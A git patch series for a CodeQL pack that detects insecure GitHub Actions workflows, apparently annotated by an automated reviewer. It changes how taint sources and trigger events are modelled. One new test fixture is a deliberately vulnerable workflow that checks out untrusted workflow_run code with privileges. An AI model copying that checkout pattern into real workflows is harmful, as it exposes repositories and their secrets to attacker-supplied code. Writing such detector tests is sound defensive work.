 .../codeql/actions/dataflow/FlowSources.qll | 3 +++
 .../workflow_run_untrusted_checkout.yml | 19 +++++++++++++++++++
 .../CWE-829/UntrustedCheckout.expected | 2 ++
 3 files changed, 24 insertions(+)
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 007ace43bd0c..ab2466bc41ba 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
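Review bot: The four trilom/file-changes-action rows put `*` in the trigger column unconditionally, while the comment directly above them says the trigger only stops mattering when the `prNumber` input is provided; as written the model treats every use of the action as a source, including uses without `prNumber` in a workflow that never receives a pull request. If the `sourceModel` row format cannot express a condition on an input, the comment should say the wildcard is a deliberate over-approximation, e.g. `# modelled as trigger-agnostic (over-approximation): the row format cannot condition on the prNumber input`. The comment also has a typo, `dont` for `doesn't`.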
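Review bot: The wildcard case added here, `source.getNode().(RemoteFlowSource).getATriggerEvent() = "*" or`, is not mirrored in ql/src/Security/CWE-078/PrivilegedCommandInjection.ql, whose `where` clause still has only the `ReusableWorkflow` and `hasTriggerEvent` disjuncts (the lines patch 136 later removes from it show no `"*"` case), so a source modelled with trigger `*`, such as the trilom rows added in this same patch, is reported as a privileged code injection but never as a privileged command injection. Factoring the trigger test into one predicate shared by both queries would stop them drifting. The enclosing `from`/`where` block starts above the hunk.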
@@ -106,7 +106,10 @@ private predicate isExternalUserControlledWorkflowRun(string context) { [
 "github\\.event\\.workflow\\.path",
 "github\\.event\\.workflow_run\\.head_branch",
 "github\\.event\\.workflow_run\\.display_title",
+ "github\\.event\\.workflow_run\\.head_branch",
 "github\\.event\\.workflow_run\\.head_repository\\.description",
+ "github\\.event\\.workflow_run\\.head_repository\\.full_name",
+ "github\\.event\\.workflow_run\\.head_repository\\.name",
 "github\\.event\\.workflow_run\\.head_commit\\.message",
 "github\\.event\\.workflow_run\\.head_commit\\.author\\.email",
 "github\\.event\\.workflow_run\\.head_commit\\.author\\.name",
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml
new file mode 100644
index 000000000000..c802355d102a
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml
@@ -0,0 +1,19 @@
+on:
+ workflow_run:
+ workflows: ['Test']
+ types: [completed]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ if: github.event.workflow_run.conclusion == "success"
+ env:
+ HEAD: ${{ github.event.workflow_run.head.sha }}
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.workflow_run.head.sha }}
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ env.HEAD }}
+
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected
index cf9d6c01d49c..dc457c6a8a7a 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected
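Review bot: The added `"github\\.event\\.workflow_run\\.head_branch",` duplicates the context entry two lines above it, so it adds nothing to the pattern set and should be dropped, leaving the two `head_repository` entries as the real change. The test workflow added in this same patch reads `github.event.workflow_run.head.sha`, which matches nothing in this list; the `workflow_run` payload exposes that value as `head_sha`, and whether a commit SHA belongs in an injection-source list at all is a separate question (a hex SHA cannot carry a payload), but the fixture should at least use the real field name. The enclosing predicate starts and ends outside the hunk.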
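Review bot: `if: github.event.workflow_run.conclusion == "success"` uses a double-quoted string literal, which GitHub's expression syntax rejects (string literals must be single-quoted), so this fixture could not run as written; the query reads it statically and the two checkout steps are flagged per the updated .expected either way, but `if: github.event.workflow_run.conclusion == 'success'` keeps the fixture a valid workflow. Likewise `github.event.workflow_run.head.sha` is not a field of the `workflow_run` payload (`head_sha` is), and a realistic fixture makes a better regression test for the source list touched in the hunk above.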
@@ -20,3 +20,5 @@
 | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
From 2ed3aceddfefcb329bf03335b4d9c6f68b08811e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 22 Mar 2024 13:32:29 +0100
Subject: [PATCH 136/707] feat(sources): Do not take triggers into consideration
---
 .../codeql/actions/dataflow/ExternalFlow.qll | 11 +--
 .../codeql/actions/dataflow/FlowSources.qll | 38 ++-------
 .../dataflow/internal/DataFlowPrivate.qll | 6 +-
 .../internal/ExternalFlowExtensions.qll | 4 +-
 ql/lib/ext/TEST-RW-MODELS.model.yml | 2 +-
 ...ahmadnassri_action-changed-files.model.yml | 4 +-
 ...nnn_action-semantic-pull-request.model.yml | 2 +-
 ql/lib/ext/cypress-io_github-action.model.yml | 2 +-
 ...dawidd6_action-download-artifact.model.yml | 2 +-
 ql/lib/ext/dorny_paths-filter.model.yml | 2 +-
 ...nzdiebold_github-env-vars-action.model.yml | 4 +-
 .../ext/jitterbit_get-changed-files.model.yml | 14 ++--
 ...han_pull-request-comment-trigger.model.yml | 4 +-
 ql/lib/ext/tj-actions_branch-names.model.yml | 6 +-
 ql/lib/ext/tj-actions_changed-files.model.yml | 34 ++++----
 .../tj-actions_verify-changed-files.model.yml | 2 +-
 ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +-
 .../xt0rted_slash-command-action.model.yml | 4 +-
 .../CWE-078/PrivilegedCommandInjection.ql | 10 ++-
 .../CWE-094/PrivilegedCodeInjection.ql | 10 ++-
 ql/test/library-tests/test.expected | 82 +++++++++----------
 ql/test/library-tests/test.ql | 4 +-
 .../.github/workflows/pull_request_target.yml | 4 +-
 .../CWE-094/PrivilegedCodeInjection.expected | 8 ++
 24 files changed, 123 insertions(+), 138 deletions(-)
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
index 08f8b6b93630..c1c93221d1af 100644
--- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
+++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
@@ -8,10 +8,9 @@ private import actions
 * - action: Fully-qualified action name (NWO)
 * - version: Either '*' or a specific SHA/Tag
 * - output arg: To node (prefixed with either `env.` or `output.`)
- * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event.
 */
-predicate sourceModel(string action, string version, string output, string trigger, string kind) {
- Extensions::sourceModel(action, version, output, trigger, kind)
+predicate sourceModel(string action, string version, string output, string kind) {
+ Extensions::sourceModel(action, version, output, kind)
 }

 /**
@@ -39,11 +38,9 @@ predicate sinkModel(string action, string version, string input, string kind) {
 Extensions::sinkModel(action, version, input, kind)
 }

-predicate externallyDefinedSource(
- DataFlow::Node source, string sourceType, string fieldName, string trigger
-) {
+predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) {
 exists(Uses uses, string action, string version, string kind |
- sourceModel(action, version, fieldName, trigger, kind) and
+ sourceModel(action, version, fieldName, kind) and
 uses.getCallee() = action.toLowerCase() and
 (
 if version.trim() = "*"
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index ab2466bc41ba..699b5f6f6c3c 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -18,8 +18,6 @@ abstract class RemoteFlowSource extends SourceNode {
 /** Gets a string that describes the type of this remote flow source. */
 abstract string getSourceType();

- abstract string getATriggerEvent();
-
 override string getThreatModel() { result = "remote" }
 }

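Review bot: `externallyDefinedSource` gets a new signature here but still has no QLDoc, while `sourceModel` just above it keeps a documented parameter list; add one on the new `predicate externallyDefinedSource(...)` line, e.g. `/** Holds if `source` is produced by a `Uses` step whose action and version match a `sourceModel` row for `fieldName`; `sourceType` is that row's kind. */`. The binding of `sourceType` is not visible in this hunk, so confirm the last clause against the rest of the body, which continues below the hunk.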
@@ -122,33 +120,20 @@ private predicate isExternalUserControlledWorkflowRun(string context) {
 }

 private class EventSource extends RemoteFlowSource {
- string trigger;
-
 EventSource() {
 exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() |
- trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context)
- or
- trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and
- isExternalUserControlledPullRequest(context)
- or
- trigger = ["pull_request_review"] and isExternalUserControlledReview(context)
- or
- trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and
- isExternalUserControlledComment(context)
- or
- trigger = ["gollum"] and isExternalUserControlledGollum(context)
- or
- trigger = ["push"] and isExternalUserControlledCommit(context)
- or
- trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context)
- or
- trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context)
+ isExternalUserControlledIssue(context) or
+ isExternalUserControlledPullRequest(context) or
+ isExternalUserControlledReview(context) or
+ isExternalUserControlledComment(context) or
+ isExternalUserControlledGollum(context) or
+ isExternalUserControlledCommit(context) or
+ isExternalUserControlledDiscussion(context) or
+ isExternalUserControlledWorkflowRun(context)
 )
 }

 override string getSourceType() { result = "User-controlled events" }
-
- override string getATriggerEvent() { result = trigger }
 }

 /**
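Review bot: With the `trigger` disjuncts gone, `EventSource` makes every context matched by the eight `isExternalUserControlled*` predicates a source regardless of which events the enclosing workflow listens to, so for example `github.event.issue.title` in a `push`-only workflow is now a source even though it is empty at runtime; the commit title says this is intended, but nothing on the class says so, and a reader of the queries will otherwise expect trigger filtering to happen here. Suggest a QLDoc on the class line: `/** A `github.event.*` context that is attacker-controlled under at least one trigger event. Deliberately trigger-agnostic: the queries decide whether the workflow's triggers make the run privileged. */`.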
@@ -156,13 +141,10 @@ private class EventSource extends RemoteFlowSource {
 */
 private class ExternallyDefinedSource extends RemoteFlowSource {
 string sourceType;
- string trigger;

- ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) }
+ ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) }

 override string getSourceType() { result = sourceType }
-
- override string getATriggerEvent() { result = trigger }
 }

 /**
@@ -174,6 +156,4 @@ private class CompositeActionInputSource extends RemoteFlowSource {
 CompositeActionInputSource() { c.getAnInput() = this.asExpr() }

 override string getSourceType() { result = "Composite action input" }
-
- override string getATriggerEvent() { result = "*" }
 }
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
index f1657717e04f..11b8bf94bca5 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
@@ -175,7 +175,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos =
 */
 predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) {
 exists(Uses astFrom, StepsExpression astTo |
- externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and
+ externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and
 astFrom = nodeFrom.asExpr() and
 astTo = nodeTo.asExpr() and
 astTo.getTarget() = astFrom
@@ -192,7 +192,7 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) {
 */
 predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) {
 exists(Uses astFrom, NeedsExpression astTo |
- externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and
+ externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and
 astFrom = nodeFrom.asExpr() and
 astTo = nodeTo.asExpr() and
 astTo.getTarget() = astFrom
@@ -232,7 +232,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) {
 astFrom = nodeFrom.asExpr() and
 astTo = nodeTo.asExpr() and
 (
- externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or
+ externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or
 astTo.getTarget() = astFrom
 )
 )
diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
index 93ec64b059e5..89cf4de02616 100644
--- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
@@ -5,9 +5,7 @@
 /**
 * Holds if a source model exists for the given parameters.
 */
-extensible predicate sourceModel(
- string action, string version, string output, string trigger, string kind
-);
+extensible predicate sourceModel(string action, string version, string output, string kind);

 /**
 * Holds if a summary model exists for the given parameters.
diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml
index 44897ef3311e..4ff387b1c5ac 100644
--- a/ql/lib/ext/TEST-RW-MODELS.model.yml
+++ b/ql/lib/ext/TEST-RW-MODELS.model.yml
@@ -9,7 +9,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "*", "Foo"]
+ - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
index 34cb56a01ad4..aabd5a3ce369 100644
--- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
+++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
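Review bot: `sourceModel` drops from five to four columns here, but this patch's diffstat does not list `ql/lib/ext/trilom_file-changes-action.model.yml`, which patch 134 in this series created with five-column rows (`"*"` in the trigger position), so after this change that extension file no longer matches the predicate's shape; whether the extension loader rejects the pack or silently drops the rows I cannot tell from the page, but either way those four sources are lost. Any out-of-tree model packs written against the old layout break the same way, so the arity change deserves a changelog line. The QLDoc above the predicate still reads `Holds if a source model exists for the given parameters.`; now that the layout changed it is a good moment to name the four columns there.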
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"]
- - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files"]
diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
index c530a3af9b3c..638ff4497353 100644
--- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
+++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"]
+ - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title"]
diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml
index 2fda092f20a5..0aaa1b0722ae 100644
--- a/ql/lib/ext/cypress-io_github-action.model.yml
+++ b/ql/lib/ext/cypress-io_github-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"]
+ - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch"]
diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
index a8a54dbda292..3bc1dcc4759d 100644
--- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml
+++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"]
+ - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details"]
diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml
index 6fefec9a4f8f..41a9c337f490 100644
--- a/ql/lib/ext/dorny_paths-filter.model.yml
+++ b/ql/lib/ext/dorny_paths-filter.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"]
+ - ["dorny/paths-filter", "*", "output.changes", "PR changed files"]
diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
index ffde7dc6a918..b6c75a06e576 100644
--- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
+++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"]
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request_target", "PR title"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
index d7cbde25b88f..2e5b0d42efdc 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"]
- - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files"]
diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
index b872bbe2ed04..18339bfa4e9b 100644
--- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
+++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""]
- - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""]
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"]
+ - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"]
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml
index 1618eddf2d8e..a7afc090a91f 100644
--- a/ql/lib/ext/tj-actions_branch-names.model.yml
+++ b/ql/lib/ext/tj-actions_branch-names.model.yml
@@ -4,7 +4,7 @@ extensions:
 extensible: sourceModel
 data:
 # https://github.com/tj-actions/branch-names
- - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"]
- - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"]
- - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"]
+ - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch"]
+ - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch"]
+ - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run"]
diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml
index 7c681d8a64b3..7890668fa878 100644
--- a/ql/lib/ext/tj-actions_changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_changed-files.model.yml
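Review bot: Once the trigger column is removed the two khan/pull-request-comment-trigger rows become byte-identical (`- ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"]` twice), so one of them should be deleted; the two xt0rted/slash-command-action rows further down in this patch collapse to the same duplicate pair. A duplicate row is harmless for a set-valued predicate, but it reads as if two distinct sources were modelled.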
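Review bot: The rewritten third row carries the existing typo `tirggering` into the new line, `"Branch tirggering workflow run"`; presumably this column feeds `getSourceType()` through `externallyDefinedSource`, in which case the misspelling is user-visible in query results, so correct it to `"Branch triggering workflow run"` while the row is being touched.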
@@ -3,20 +3,20 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"]
\ No newline at end of file
+ - 
["tj-actions/changed-files", "*", "output.added_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 9b6649892afa..1946b78f5fd3 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml 
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files"]
diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml
index 6ce7dd68b3f0..d4b083e14d22 100644
--- a/ql/lib/ext/tzkhan_pr-update-action.model.yml
+++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""]
+ - ["tzkhan/pr-update-action", "*", "output.headMatch", ""]
diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml
index 72df42535db9..31a1eb5bde91 100644
--- a/ql/lib/ext/xt0rted_slash-command-action.model.yml
+++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""]
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", "pull_request_comment", ""]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""]
diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql
index 6f66535e6a41..2f9a09f59c38 100644
--- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql
+++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql
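Review bot: The tzkhan/pr-update-action row keeps an empty kind column (`""`), as do both xt0rted/slash-command-action rows below it, while this same patch fills that column in for khan/pull-request-comment-trigger with `"Comment body"`; presumably the column feeds `getSourceType()` through `externallyDefinedSource`, in which case these sources report an empty type in query output. Suggest giving each a short description of what the output holds, in the style of the other model files, e.g. `- ["tzkhan/pr-update-action", "*", "output.headMatch", "PR head branch match"]` if that is what `headMatch` carries.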
@@ -16,14 +16,16 @@ import actions
 import codeql.actions.security.CommandInjectionQuery
 import CommandInjectionFlow::PathGraph

+predicate isSingleTriggerWorkflow(Workflow w, string trigger) {
+ w.getATriggerEvent() = trigger and
+ count(string t | w.getATriggerEvent() = t | t) = 1
+}
+
 from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w
 where
 CommandInjectionFlow::flowPath(source, sink) and
 w = source.getNode().asExpr().getEnclosingWorkflow() and
- (
- w instanceof ReusableWorkflow or
- w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
- )
+ not isSingleTriggerWorkflow(w, "pull_request")
 select sink.getNode(), source, sink,
 "Potential privileged command injection in $@, which may be controlled by an external user.",
 sink, sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql
index 69ab240616e6..62030e322633 100644
--- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql
+++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql
@@ -18,14 +18,16 @@ import actions
 import codeql.actions.security.CodeInjectionQuery
 import CodeInjectionFlow::PathGraph

+predicate isSingleTriggerWorkflow(Workflow w, string trigger) {
+ w.getATriggerEvent() = trigger and
+ count(string t | w.getATriggerEvent() = t | t) = 1
+}
+
 from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w
 where
 CodeInjectionFlow::flowPath(source, sink) and
 w = source.getNode().asExpr().getEnclosingWorkflow() and
- (
- w instanceof ReusableWorkflow or
- w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
- )
+ not isSingleTriggerWorkflow(w, "pull_request")
 select sink.getNode(), source, sink,
 "Potential privileged code injection in $@, which may be controlled by an external user.",
 sink, sink.getNode().asExpr().(Expression).getRawExpression()
